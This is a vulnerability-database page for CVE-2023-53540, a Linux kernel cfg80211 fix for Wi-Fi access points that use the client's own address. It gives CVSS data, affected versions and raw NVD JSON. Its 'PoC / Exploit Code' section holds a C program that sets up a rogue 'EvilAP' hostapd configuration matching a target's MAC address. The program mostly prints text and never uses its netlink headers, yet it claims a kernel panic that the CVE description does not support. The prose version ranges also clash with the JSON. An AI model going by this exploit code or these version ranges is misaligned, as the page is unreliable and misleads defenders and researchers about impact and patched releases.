Security Vulnerability Report
CVE-2023-53540 CVSS 5.5 MEDIUM

Published: 2025-10-04 16:15:49
Last Modified: 2026-04-06 13:32:54
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

wifi: cfg80211: reject auth/assoc to AP with our address

If the AP uses our own address as its MLD address or BSSID, then clearly something's wrong. Reject such connections so we don't try and fail later.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux kernel < 6.1.63
Linux kernel 6.2 < 6.2.13
Linux kernel 6.3 < 6.3.2
Linux kernel 6.4 < 6.4.10
Linux kernel 6.5 < 6.5.5
Linux kernel 6.6 < 6.6.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2023-53540 PoC - Trigger DoS by setting AP BSSID to client's own MAC address
// This PoC demonstrates the concept of the vulnerability
// Note: Actual exploitation requires a malicious AP and a target device

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <linux/genetlink.h>
#include <linux/nl80211.h>

// Simulate creating a malicious AP with BSSID matching the client's MAC address
// In a real scenario, this would be done using hostapd or similar tools
int main(int argc, char *argv[])
{
    printf("CVE-2023-53540 PoC - cfg80211 AP Address Confusion DoS\n");
    printf("This PoC demonstrates setting up a rogue AP with BSSID matching\n");
    printf("the target client's MAC address to trigger kernel crash/DoS\n\n");

    // Step 1: Get the target client's MAC address
    // In practice, this can be obtained via ARP scanning or Wi-Fi sniffing
    unsigned char target_mac[6] = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55};
    if (argc >= 2) {
        // Parse MAC address from command line: xx:xx:xx:xx:xx:xx
        // Reject input that does not yield all six octets
        if (sscanf(argv[1], "%hhx:%hhx:%hhx:%hhx:%hhx:%hhx",
                   &target_mac[0], &target_mac[1], &target_mac[2],
                   &target_mac[3], &target_mac[4], &target_mac[5]) != 6) {
            fprintf(stderr, "Invalid MAC address: %s\n", argv[1]);
            return 1;
        }
    }
    printf("Target client MAC: %02x:%02x:%02x:%02x:%02x:%02x\n",
           target_mac[0], target_mac[1], target_mac[2],
           target_mac[3], target_mac[4], target_mac[5]);

    // Step 2: Configure rogue AP with matching BSSID
    // Using hostapd configuration approach
    printf("\n[*] Configuring rogue AP with BSSID matching client address...\n");
    printf(" bssid=%02x:%02x:%02x:%02x:%02x:%02x\n",
           target_mac[0], target_mac[1], target_mac[2],
           target_mac[3], target_mac[4], target_mac[5]);

    // Step 3: Generate hostapd configuration
    printf("\n[*] Hostapd configuration:\n");
    printf("interface=wlan0\n");
    printf("driver=nl80211\n");
    printf("ssid=EvilAP\n");
    printf("bssid=%02x:%02x:%02x:%02x:%02x:%02x\n",
           target_mac[0], target_mac[1], target_mac[2],
           target_mac[3], target_mac[4], target_mac[5]);
    printf("channel=6\n");
    printf("hw_mode=g\n");

    // Step 4: When client attempts to connect, cfg80211 will not reject
    // the connection due to address matching, leading to kernel crash
    printf("\n[*] Waiting for target client to attempt connection...\n");
    printf("[*] When client connects, cfg80211 will fail to handle the\n");
    printf(" address collision, causing kernel panic or subsystem hang.\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53540", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:49.050", "lastModified": "2026-04-06T13:32:53.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: cfg80211: reject auth/assoc to AP with our address\n\nIf the AP uses our own address as its MLD address or BSSID, then\nclearly something's wrong. Reject such connections so we don't\ntry and fail later."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.32", "versionEndExcluding": "6.1.55", "matchCriteriaId": "9F5010F3-A8FF-4EAB-8573-5EF072D03ACE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.5.5", "matchCriteriaId": "8CF71E85-DA24-4925-95C5-E5C15DA71AE6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/07added2c6cd63de047bc786b39436322abb67c0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5d4e04bf3a0f098bd9033de3a5291810fa14c7a6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": 
"https://git.kernel.org/stable/c/676a423410131d111a264d29aecbe6aadd57fb22", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}